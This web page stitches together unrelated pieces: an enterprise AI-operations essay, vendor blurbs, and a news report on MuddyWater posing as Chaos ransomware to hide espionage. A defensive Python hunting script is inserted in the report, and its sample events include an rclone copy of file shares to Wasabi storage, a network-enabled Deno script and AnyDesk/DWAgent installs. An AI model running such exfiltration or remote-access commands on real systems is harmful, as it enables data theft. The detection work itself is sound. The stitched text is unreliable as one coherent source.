Instead, you should focus those agents on outcomes and allow them to operate in the way they’re designed to. That’s where you’re going to see a bigger impact.
Enterprises have made significant progress in building artificial intelligence capabilities. Access to models, tools, and platforms has expanded rapidly, lowering the barrier to entry for experimentation. Yet many organizations are discovering that building AI is only the first step. Running it at scale is where the real challenge begins.
The difficulty is not in creating models, but in operationalizing them.
As AI moves from pilot to production, it must integrate into complex enterprise environments. These environments include fragmented data systems, legacy infrastructure, and distributed workflows that were not designed to support AI-driven execution. What works in a controlled experiment often breaks down under real-world conditions.
Data is one of the most significant constraints. AI systems rely on consistent, high-quality, and context-rich data. In most enterprises, data is spread across multiple platforms and lacks a unified structure. Without a shared understanding of what data represents, models struggle to produce reliable outputs. More importantly, business teams cannot act on those outputs with confidence.
This challenge becomes more pronounced as organizations attempt to scale AI across use cases. Each new deployment introduces additional complexity, from data integration and governance to security and compliance. Without a strong foundation, these factors slow progress and increase operational risk.
Running AI also requires a different operating model. Traditional approaches to cloud and application management are often reactive, relying on manual processes and ticket-driven workflows. These models are not designed to support the continuous monitoring, iteration, and optimization that AI systems require.
Organizations that treat AI as an isolated capability often encounter friction at this stage. Models may perform well in testing, but struggle to deliver consistent value once deployed. This disconnect between development and operations limits the return on AI investments.
In contrast, organizations that succeed with AI focus on how it is run, not just how it is built. They align data, infrastructure, and operations around AI-driven execution. This includes creating unified data environments, embedding governance into workflows, and enabling real-time access to information.
Automation plays a critical role in this transition. Managing AI systems at scale involves monitoring performance, maintaining data quality, and responding to changing conditions. Embedding automation into these processes helps reduce manual effort and improve consistency. Over time, this enables organizations to operate AI systems more efficiently and with greater reliability.
The shift toward AI-first operating models is becoming more pronounced. In these environments, intelligence and automation are embedded into how systems are designed and operated. This allows organizations to move from reactive processes to more proactive and predictive operations. As a result, they can reduce operational overhead, improve delivery speed, and better support AI-driven innovation.
This evolution is also being driven by increasing business expectations. Leadership teams expect AI to deliver measurable outcomes tied to efficiency, speed, and resilience. However, these outcomes depend on the ability to run AI effectively across the enterprise. Without the right operating model, even advanced AI capabilities will struggle to deliver consistent value.
At the same time, AI-native organizations are setting a new benchmark. They can deploy and scale AI more quickly because their environments are built with automation and integration at the core. This allows them to iterate faster and respond more effectively to changing conditions.
For established enterprises, the path forward requires a shift in focus. Building AI capabilities remains important, but it must be matched with investments in data foundations, operating models, and automation. This is what enables AI to move beyond experimentation and deliver real business outcomes.
The takeaway for CIOs and technology leaders is clear: the success of AI initiatives depends less on the models themselves and more on the systems that support them. Organizations that prioritize how AI is run will be better positioned to scale, adapt, and realize the full value of their investments.
Continue building your AI strategy with a practical, execution-focused framework. Check out the AI Action Playbook to learn about the five stages of enterprise AI maturity.
LevelBlue’s Security Services issues Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.
Chrome users were caught off guard by a 4-GB Google AI model baked into Chrome, sparking privacy concerns. The good news: You can easily uninstall it. The bad? You might not want to.
Researchers have discovered a new malvertising campaign using a fake Claude AI website to plant a new, undocumented backdoor named Beagle on user devices.
Iran-linked APT MuddyWater used ransomware-style tactics to mask espionage, combining phishing, credential theft, data exfiltration, and extortion without encryption.
A newly discovered cyber intrusion attributed to the Iran-linked APT MuddyWater (aka SeedWorm, TEMP.Zagros, Mango Sandstorm, TA450, and Static Kitten) reveals how state-sponsored attackers are increasingly leveraging ransomware tactics to disguise espionage operations. The campaign, uncovered by security researchers at Rapid7, blended social engineering, credential theft, data exfiltration, and extortion under the guise of a ransomware incident — but with no evidence of actual file encryption.
The attack unfolded in early 2026 and initially appeared to be a routine ransomware case. Victims were led to believe they were dealing with the Chaos ransomware group, which operates a leak site for stolen data. However, further investigation showed no ransomware had been deployed. Instead, the attackers relied on espionage tradecraft — lateral movement, credential harvesting, and information theft — consistent with MuddyWater’s long-standing intelligence-gathering profile.
“In early 2026, a sophisticated intrusion initially appearing to be a standard Chaos ransomware attack was assessed to be consistent with a targeted state-sponsored operation. While the threat actor operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, forensic analysis revealed the incident was a ‘false flag’ masquerade,” reads the report published by Rapid7. “Technical artifacts, including a specific code-signing certificate and Command-and-Control (C2) infrastructure, suggest with moderate confidence that this activity is linked to MuddyWater (Seedworm), an Iranian Advanced Persistent Threat (APT) affiliated with the Ministry of Intelligence and Security (MOIS).”
Rapid7’s analysis shows that the threat actors gained initial access through social engineering tactics, exploiting trust in corporate communications tools. Attackers used Microsoft Teams to contact employees directly, posing as internal IT staff or business associates. Through these conversations, they persuaded users to begin screen-sharing sessions, giving the attackers direct visibility into corporate desktops and systems.
Once connected, the hackers executed reconnaissance commands, accessed files related to VPN configurations, and tricked employees into writing their credentials into locally saved text files. In at least one case, they installed the AnyDesk remote access tool to maintain a foothold in the organization’s network.
After establishing initial access, the threat actors utilized RDP sessions and DWAgent, another remote management tool, to maintain persistence. From there, they launched secondary payloads, harvested more credentials, and exfiltrated sensitive internal information.
“From there, the TA established persistence using remote access tools such as DWAgent and AnyDesk, before deploying additional payloads and further control of the environment,” reads the report. “Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations.”
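A defender-side hunt over process-creation telemetry for the chain described above (screen-share reconnaissance, remote access tool install, later payloads and exfiltration), as an added example that is not Rapid7's code. The executable names for AnyDesk and DWAgent, the Sysmon-style events, and the Rclone-to-Wasabi and Deno indicators (which the article reports for the later Dindoor campaign) are assumptions or constructed samples, not indicators from the report.

```python
"""Process-creation hunting heuristics for the MuddyWater tradecraft above.

Added example (not Rapid7's code): constructed Sysmon-style events are tagged
with the kill-chain stage they map to, so a responder can see when recon,
remote-access-tool persistence and cloud exfiltration line up on one host.
"""
from __future__ import annotations

import json
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Remote access tools named in the report; exact file names are assumptions,
# so we match on the product name anywhere in the executable name.
RAT_MARKERS = ("anydesk", "dwagent", "dwagsvc")
# Hands-on-keyboard reconnaissance commands typically run over a screen share.
RECON_CMDS = {"whoami", "ipconfig", "systeminfo", "nltest", "net", "quser", "hostname"}
RECON_WINDOW = timedelta(minutes=10)
RECON_THRESHOLD = 3  # distinct recon commands inside the window
WASABI_ENDPOINT = "wasabisys.com"  # Wasabi S3 API domain


@dataclass(frozen=True)
class Finding:
    host: str
    stage: str  # recon | persistence | execution | exfiltration
    rule: str
    evidence: str


def _exe(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def classify(event: dict) -> Finding | None:
    """Map one process-creation event to a stage, or None if it looks benign."""
    name, host = _exe(event["image"]), event["host"]
    cmd = event.get("cmdline", "").lower()
    if any(m in name for m in RAT_MARKERS):
        return Finding(host, "persistence", "remote_access_tool", name)
    if "rclone" in name:
        dest = "wasabi" if WASABI_ENDPOINT in cmd else "unknown-endpoint"
        return Finding(host, "exfiltration", "rclone_cloud_copy", f"{name} -> {dest}")
    if name == "deno.exe" and " run " in cmd and "--allow-net" in cmd:
        # Dindoor runs JavaScript/TypeScript under Deno; a script launched with
        # network permission is worth a look (heuristic, not a signature).
        return Finding(host, "execution", "deno_script_with_network", cmd)
    return None


def recon_bursts(events: list[dict]) -> list[Finding]:
    """Flag (host, user) pairs running RECON_THRESHOLD distinct recon commands inside RECON_WINDOW."""
    per_key: dict[tuple[str, str], list[tuple[datetime, str]]] = defaultdict(list)
    for ev in events:
        cmd_name = _exe(ev["image"]).removesuffix(".exe")
        if cmd_name in RECON_CMDS:
            per_key[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["ts"]), cmd_name))
    findings = []
    for (host, user), rows in per_key.items():
        rows.sort()
        for i, (t0, _) in enumerate(rows):
            seen = {n for t, n in rows[i:] if t - t0 <= RECON_WINDOW}
            if len(seen) >= RECON_THRESHOLD:
                findings.append(Finding(host, "recon", "recon_burst", f"{user}: {sorted(seen)}"))
                break  # one finding per host/user is enough
    return findings


def hunt(events: list[dict]) -> list[Finding]:
    """Run every heuristic: recon bursts first, then per-event hits in event order."""
    return recon_bursts(events) + [f for f in map(classify, events) if f]


def stages_by_host(findings: list[Finding]) -> dict[str, set[str]]:
    """Collapse findings into the set of kill-chain stages observed per host."""
    stages: dict[str, set[str]] = defaultdict(set)
    for f in findings:
        stages[f.host].add(f.stage)
    return dict(stages)


# Constructed telemetry, not real victim data: a workstation showing screen-share
# recon and an AnyDesk install, a server showing DWAgent, a Deno script and an
# Rclone copy to a Wasabi endpoint, and one benign host with a lone ipconfig.
SAMPLE_EVENTS = [json.loads(line) for line in r"""
{"ts":"2026-02-10T09:02:40","host":"WS-FIN-07","user":"jdoe","image":"C:\\Windows\\System32\\whoami.exe","cmdline":"whoami /all"}
{"ts":"2026-02-10T09:03:05","host":"WS-FIN-07","user":"jdoe","image":"C:\\Windows\\System32\\ipconfig.exe","cmdline":"ipconfig /all"}
{"ts":"2026-02-10T09:04:30","host":"WS-FIN-07","user":"jdoe","image":"C:\\Windows\\System32\\net.exe","cmdline":"net user"}
{"ts":"2026-02-10T09:20:00","host":"WS-FIN-07","user":"jdoe","image":"C:\\Users\\jdoe\\Downloads\\AnyDesk.exe","cmdline":"AnyDesk.exe --install"}
{"ts":"2026-02-11T02:15:00","host":"SRV-FILE-01","user":"svc_backup","image":"C:\\ProgramData\\DWAgent\\native\\dwagsvc.exe","cmdline":"dwagsvc.exe"}
{"ts":"2026-02-11T02:20:00","host":"SRV-FILE-01","user":"svc_backup","image":"C:\\Users\\Public\\deno.exe","cmdline":"deno.exe run --allow-net --allow-read C:\\Users\\Public\\update.ts"}
{"ts":"2026-02-12T23:41:00","host":"SRV-FILE-01","user":"svc_backup","image":"C:\\Temp\\rclone.exe","cmdline":"rclone.exe copy D:\\Shares\\Legal remote:bucket --s3-endpoint s3.wasabisys.com"}
{"ts":"2026-02-10T11:00:00","host":"WS-HR-02","user":"asmith","image":"C:\\Windows\\System32\\ipconfig.exe","cmdline":"ipconfig"}
""".strip().splitlines()]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:12} {f.stage:13} {f.rule:25} {f.evidence}")
    print(stages_by_host(hunt(SAMPLE_EVENTS)))
```

A host where recon, persistence and exfiltration stages coincide is the pattern the report describes; the individual rules are noisy on their own (IT staff also install AnyDesk), so the per-host stage set is what a responder should triage on.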
As part of the deception, MuddyWater operatives sent extortion emails to employees, claiming to have stolen confidential data and threatening to leak it unless a ransom was paid. They directed victims to the Chaos ransomware site, where the organization was indeed listed as a “new victim.”
However, when the supposed ransom “note” could not be located, the threat actors released the stolen data publicly, revealing that the true objective was data theft, not financial gain.
Rapid7 concluded that the entire ransomware scenario was a smokescreen designed to mislead defenders. “The inclusion of extortion and negotiation elements likely aimed to focus response teams on the immediate impact, delaying detection of persistence mechanisms implanted through remote access tools,” the researchers wrote.
The recent campaign spotted by Rapid7 highlights a broader trend in which nation‑state actors blend espionage with criminal aesthetics to mislead victims and deflect investigators. By adopting the look and feel of a ransomware attack, complete with fake negotiation email threads and presence on an established leak site, MuddyWater obscured its true intent: long-term infiltration and intelligence collection.
Rapid7 assessed the attribution to MuddyWater with “moderate confidence,” citing both technical overlap and contextual consistency. The researchers noted that the incident does not represent a strategic shift toward ransomware operations, but rather an evolution in deception and misdirection techniques designed to complicate attribution and response.
By masquerading as a financially motivated actor, the Iranian APT hoped to divert attention and prolong access to compromised networks. The tactic underscores how modern cyber espionage is no longer confined to covert surveillance; it now borrows the tools, language, and theatrics of cybercrime to hide in plain sight.
The episode serves as a warning to defenders: not every ransomware attack is what it seems. When state-backed adversaries like MuddyWater adopt the same playbook as criminal gangs, distinguishing espionage from extortion becomes one of cybersecurity’s most urgent challenges.
“The use of a RaaS framework in this context may enable the actor to blur distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution,” concludes the report. “Furthermore, the inclusion of extortion and negotiation elements could serve to focus defensive efforts on immediate impact, likely delaying the identification of underlying persistence mechanisms established via remote access tools such as DWAgent or AnyDesk.”
The first MuddyWater campaign was observed in late 2017, when the APT group targeted entities in the Middle East.
Experts named the campaign ‘MuddyWater’ due to the difficulty in attributing a wave of attacks between February and October 2017, targeting entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States. Over the years, the group has evolved by adding new attack techniques to its arsenal and has also targeted European and North American countries.
The group’s victims are mainly in the telecommunications, government (IT services), and oil sectors.
In January 2022, US Cyber Command (USCYBERCOM) officially linked the MuddyWater APT group to Iran’s Ministry of Intelligence and Security (MOIS).
The MuddyWater APT has targeted several organizations in the U.S. and Canada since early February 2026. Victims include a U.S. bank, an airport, nonprofits, and a software supplier to the defense and aerospace sectors with operations in Israel. The previously unknown backdoor Dindoor relies on the Deno runtime to execute JavaScript and TypeScript code and was signed with a certificate issued to “Amy Cherne.”
The researchers also observed an attempt to exfiltrate data from a targeted software company using Rclone to a Wasabi Technologies cloud storage bucket, though it’s unclear if the transfer succeeded. The experts also spotted a separate Python backdoor, dubbed Fakeset, on U.S. airport and nonprofit networks, signed with certificates tied to Seedworm. The malware was hosted on Backblaze servers, and shared certificates with other Seedworm-linked malware families, suggesting the Iranian group was behind the intrusions.
Recent activity linked to Iranian cyber actors shows a mix of espionage, disruption, and influence operations. The pro-Palestinian hacktivist group Handala has targeted Israeli officials and energy firms through phishing, data theft, ransomware, and leak campaigns, claiming breaches of organizations in Israel and the Gulf. Meanwhile, the Iranian APT Seedworm conducted spear-phishing attacks against academics, NGOs, and government entities to gather intelligence. Another group, Marshtreader, scanned vulnerable cameras in Israel for reconnaissance during regional tensions.
In March, the Iran-linked APT targeted U.S. organizations, deploying the new Dindoor backdoor across sectors including banks, airports, and nonprofits, Broadcom’s Symantec Threat Hunter Team revealed.